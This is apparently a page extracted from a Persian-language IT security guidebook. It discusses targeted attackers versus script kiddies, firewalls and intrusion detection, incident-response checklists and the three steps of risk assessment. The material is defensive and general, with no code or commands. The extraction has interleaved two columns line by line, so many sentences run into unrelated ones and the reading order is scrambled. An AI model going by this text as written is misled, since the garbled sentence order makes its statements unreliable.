ﺶ ﺑﻪﺭﻭﺯ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ ﺭﻭﺍﺝ ﺍﻳﻦ ﺗﻬﺪﻳﺪ ،ﺳـﺎﺯﻧﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨـﻲ ﻳـﺎ ""script kiddieﻫـﺎ ﻣﺆﺛﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﻧﻔـﻮﺫ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻧـﺪ.
ﻛﻔﺎﻳﺖ ﻛﻨﻨﺪ .ﺍﻣـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﻫﺪﻓـﺪﺍﺭ ،ﺍﻳـﻦ ﺭﺍﻫﺒـﺮﺍﻥ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳـﺎﺏ ٦١ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ
ﻫﻮﺷﻴﺎﺭ ﺳﻴﺴﺘﻢ ﻭ ﻣﺪﻳﺮﺍﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ.
ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻻ ﻣﻬﺎﺟﻤﺎﻥ ﺧﺒـﺮﻩﺍﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ ﻣﻌﻤﻮ ﹰ
ﺗﻮﺟﻪ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺣﻤﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭﻭﻥﺳـﺎﺯﻣﺎﻧﻲ ﻫﺪﻑ ﺁﻧﻬﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ،ﺗﺨﺮﻳﺐ ﻭ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎ ،ﻭ
ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻣﺎ ﻫﻴﭻ ﻃﺮﺣﻲ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴـﺴﺖ ﻭ ﺑـﺴﻴﺎﺭ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻣـﻲﺑﺎﺷـﺪ.
ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﺳﺎﺑﻘﻪ ﻭ ﺭﻭﻧﺪ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﺑﺎ ﺗﻮﺟـﻪ ﺑﺮﺧﻼﻑ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ﻭ ""script kiddieﻫﺎ ،ﻫـﺪﻑ ﺁﻧﻬـﺎ
ﺑﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻤﺮﹰﺍ ﺑﺮﺭﺳﻲ ﻛﻨـﺪ .ﻧﻈـﺎﺭﺕ ﻣـﺴﺘﻤﺮ ﺑـﺮ ﻭﺍﻗﻌﹰﺎ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺳـﺖ .ﺁﻧﻬـﺎ ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺑـﺪﻧﺒﺎﻝ
ﺩﻭﺭﻧﻤــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ،ﻛــﺸﻒ ﻭ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔــﻮﺫ ﺭﺍ ﺳــﺎﺩﻩﺗــﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﺎﻟﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ ﻛـﺎﺭﺕ
ﻣﻲﻧﻤﺎﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺩﺭﺑـﺎﺭﺓ ﺁﻧﭽـﻪ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺟﺰﺋﻴﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ( ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ
ﻛﻪ ﺑﺎﻳﺪ ﺣﻴﻦ ﻭ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﻪ ﻛﺎﻫﺶ ﺁﺳﻴﺐ ﺷﻨﺎﺳﺎﻳﻲ ،ﺳﻮﺍﺑﻖ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ( ﻫـﺴﺘﻨﺪ ﺗـﺎ ﺁﻧﻬـﺎ ﺭﺍ
ﻛﻤﻚ ﻣﻲﻛﻨﺪ ،ﺍﻓـﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺭﺍ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﺧﺮﺍﺑـﻲ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ﻳﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ .ﺍﻳـﻦ ﺩﺳـﺘﻪ ﺍﺯ
ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﺪ ﻭ ﺍﻣﻜﺎﻥ ﺛﺒﺖ ﻣﻨﺎﺳﺐ ﮔﺰﺍﺭﺷﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻏﺎﻟﺒﹰﺎ ﺑﺨﻮﺑﻲ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﺍﻧﺠـﺎﻡ
ﻣﻘﺎﻣﺎﺕ ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ. ﺣﻤﻠﺔ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺭﺍﺟـﻊ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻗﺮﺑـﺎﻧﻲ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﻨﺪ .ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﻧﻮﻉ ﻣﺠﺮﻣﺎﻥ ﻛﻤﺘـﺮ
ﺗﺨﻤﻴﻦ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ: ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﺳﺖ ،ﺍﻣﺎ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔﻮﺫ ﺁﻧـﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻞ
ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴـﺰ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎﻋـﺚ
ﺗﺨﺮﻳﺒﻬﺎﻱ ﺟﺪﻱ ﺷﻮﻧﺪ.
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻳﺸﻪ ﺩﺭ ﺣﻤﻼﺕ
ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﻭ ﻳـﺎ ﺳـﻬﻮﻱ
ﺩﺍﺩﻩﻫﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻏﻴﺮﺍﺧﻼﻗﻲ ﻣﻨﺘﻬﻲ ﻣﻲﺷـﻮﻧﺪ. ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ ﻭ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ ﺑـﻪ
ﮔﺎﻣﻬﺎﻱ ﺍﺑﺘﺪﺍﻳﻲ ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺯﻣﺎﻧﻲ ﺑﺮﺩﺍﺷﺘﻪ ﻣﻲﺷـﻮﺩ ﻣﺎﻫﻴﺖ ﺭﻭﺍﺑﻂ ﺁﻧﻬﺎ ﺑﺎ ﻣـﺪﻳﺮﺍﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧـﺸﺎﻥ ﺩﺭ ﻣﺤـﻴﻂ ﻛـﺎﺭ
ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﻳﻚ ﺗﺨﻤﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺩﺍﺧﻠـﻲ،
ﺍﻫﺪﺍﻑ ،ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳـﻦ
61 )Intrusion Detection Systems (IDSs
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٤٠
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ؛ o ﻋﻨﺎﺻﺮ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴـﻞ ﺷـﺪﻧﺪ ،ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻧﻴـﺰ
ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺣﻤﻠﻪ؛ o ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﺭﻭﺍﻟﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﻪ ﻳﺎﺑﺪ.
ﺍﻋﻼﻡ ﺣﻤﻠﻪ ﺑﻪ ﻣﺪﻳﺮﺕ ﺍﺭﺷﺪ؛ o
ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺣﻮﺯﻩﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺫﻳـﻞ
ﺛﺒﺖ ﻭﻗﺎﻳﻊ؛ o
٦٤
ﺑﺎﺷﺪ:
ﺗﻬﻴﺔ ﺗﺼﺎﻭﻳﺮ ﺁﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ؛ o
ﺗﻤﺎﺱ ﺑﺎ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ o ﺩﺍﻧﺴﺘﻦ ﺯﻣﺎﻧﻲ ﻛﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻳﺪ -ﺍﺯ ﻃﺮﻳﻖ •
ﻣﺮﺍﺣﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ oﺁﻳﺎ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ
)ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺍﺯ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﺍﺣﺘﻤـﺎﻟﻲ ﺗﻌﺮﻳـﻒ
ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻳﻦ
ﺷﺪﻩ ﺍﺳﺖ؟
ﺳﺌﻮﺍﻻﺕ ﺍﺳﺎﺳﻲ ﺍﺳﺖ:
oﺁﻳﺎ ﺭﻭﺍﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺯﻣﺎﻥ ﺗﻤﺎﺱ ﺑﺎ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ
.۱ﺳﻌﻲ ﺩﺭ ﺣﻔﻆ ﭼﻪ ﭼﻴﺰﻱ ﺩﺍﺭﻡ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻘـﺪﺭ ﺑـﺮﺍﻱ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤـﻚ ﻭ ﻓـﺮﺩﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﻳـﻦ
ﻣﻦ ﺍﺭﺯﺵ ﺩﺍﺭﺩ؟ ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
.۲ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺭﻡ؟
.۳ﺣﺎﺿــﺮﻡ ﭼﻘــﺪﺭ ﺯﻣــﺎﻥ ،ﺗــﻼﺵ ﻭ ﺳــﺮﻣﺎﻳﻪ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ:
ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻢ؟ ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﻛﻨﺎﻥ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺭﻭﺍﻟﻬـﺎ o
٦٧ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟
ﺱ ﻓﺮﺁﻳﻨـﺪﻱ ﺑـﻪ ﻧـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ
ﺍﻳﻦ ﺳﺆﺍﻻﺕ ،ﺍﺳﺎ ﹺ
ﺷﻜﻞ ﻣﻲﺩﻫﻨﺪ .ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺑﺨﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺁﻳــﺎ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ﻭﺍﻗﻌ ـﹰﺎ ﺩﺭ ﻫﻤــﺔ ﺟﻠــﺴﺎﺕ o
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ .ﺍﮔﺮ ﺷﻤﺎ ﻧﺪﺍﻧﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﭼﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﺁﻣﻮﺯﺷﻲ ﺣﻀﻮﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؟
ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﻴﺪ ،ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧـﺴﺖ ﮔﺎﻣﻬـﺎﻱ ﺁﻳــﺎ ﺩﻟﻴــﻞ ﺍﻧﺘﺨــﺎﺏ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ،ﺳــﻮﺍﺑﻖ o
ﺁﻧﺮﺍ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴـﺪ .ﻭﻗﺘـﻲ ﺧﻄـﺮﺍﺕ ﺭﺍ ﺷـﻨﺎﺧﺘﻴﺪ ،ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭﺧﺸﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺩﻩ ﺍﺳﺖ؟
ﺑﺨﺶ ﺳﻮﻡ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﻨﻮﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﻩ ﺁﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ o
ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺭﺍ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔـﺮ ﺧﻄـﺮ ﻗﻄـﻊ ﺑـﺮﻕ ﺭﻭﺍﻥ ﺍﺳﺖ؟
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺍﺳﺖ ،ﺑﺎﻳﺪ ﺍﻳﻦ ﺧﻄﺮ ﺭﺍ ﺑـﺎ
ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺑﻊ ﻓﻨﻲ:
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ٦٨UPSﻛﺎﻫﺶ ﺩﻫﻴﺪ.
ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻛﺮﺩﻥ ﻳﺎ ﭘﺎﻳـﺎﻥ ﺩﺍﺩﻥ ﺑـﻪ o
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﺔ ﻛﻠﻴﺪﻱ ﺍﺳﺖ:
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺍﺭﺯﺵ ﺁﻧﻬﺎ .۱ ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺕ ﺁﻏﺎﺯ ﻳﺎ ﭘﺎﻳﺎﻥ ﻃﺮﺡ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ o
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ .۲ ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ؟
ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ .۳ ﺁﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﻛـﺸﻒ ﺗﻬـﺎﺟﻢ ﺭﻭﻱ o
ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻳـﻚ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻭ ﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟
ﺭﻭﺵ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑـﺴﻴﺎﺭ ﻣﻮﻓـﻖ ﺑـﻮﺩﻩ ،ﺍﻳﺠـﺎﺩ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻨﺎﺳﺎﻳﻲ ٦٦ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ o
ﻲ ﺩﺭﻭﻥﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺷـﻤﺎ ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺁﻣﻮﺯﺷ ﹺ ﻣﻲﺗﻮﺍﻧﺪ ﺣﻤﻼﺕ ﻧﺎﺷﻨﺎﺧﺘﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ؟
ﺑﺎﻳــﺪ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﮔــﺎﻩ ﺑﺨــﺸﻬﺎﻱ ﻣﺨﺘﻠــﻒ ،ﻣــﺪﻳﺮﺍﻥ ﻣﻴــﺎﻧﻲ ﻭ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﻻﻳﻪﺑﻨـﺪﻱﺷـﺪﻩ o
ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺩﻋـﻮﺕ ﺑﻌﻤـﻞ ﺁﻭﺭﻳـﺪ؛ ﻭ ﻃـﻲ ﺣﻤﻼﺗﻲ ﻛﻪ ﺑـﻪ ﺷـﺒﻜﻪ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻛـﺸﻒ ﻭ ﺍﺯ
ﺟﻠﺴﺎﺗﻲ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴـﺪ .ﺍﻳـﻦ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟
ﻓﺮﺁﻳﻨﺪ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺗﻬﻴﻪ ﺁﻳــﺎ ﺭﻭﻱ ﺷــﺒﻜﻪ ﻣــﻲﺗــﻮﺍﻥ ﺣﻤــﻼﺕ ﺭﺍ ﺑــﺴﺎﺩﮔﻲ o
ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺁﮔﺎﻫﻲ ﺣﻀﺎﺭ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺮﺩ. ﺗﻌﻘﻴﺐ ﻛﺮﺩ؟
ﻲ ﺍﻣﻨﻴــﺖ ،ﻛﻠﻴــﺔ
ﻱ ﺭﺳــﻤ ﹺﺁﻳــﺎ ﺑــﺮ ﺍﺳــﺎﺱ ﻣﻤﻴــﺰ ﹺ o
ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺁﻣﺎﺭﻱ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ
ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ؟
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﺎ ﻳﻚ ﺷـﺮﻛﺖ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ
ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ
oﺣﺴﻦ ﻧﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ؛ ﺩﻭﻟﺘﻲ ،ﻭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﻬﻢ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻣـﻮﺍﺭﺩﻱ،
ﻥ ﭘﺮﺩﺍﺯﺵ؛ ﻭ oﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣـﺸﺎﻭﺭﻩﺍﻱ ﻛـﻪ ﻣﺘﺨـﺼﺺ
oﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ. ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧـﺮﻡ-
ﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ.
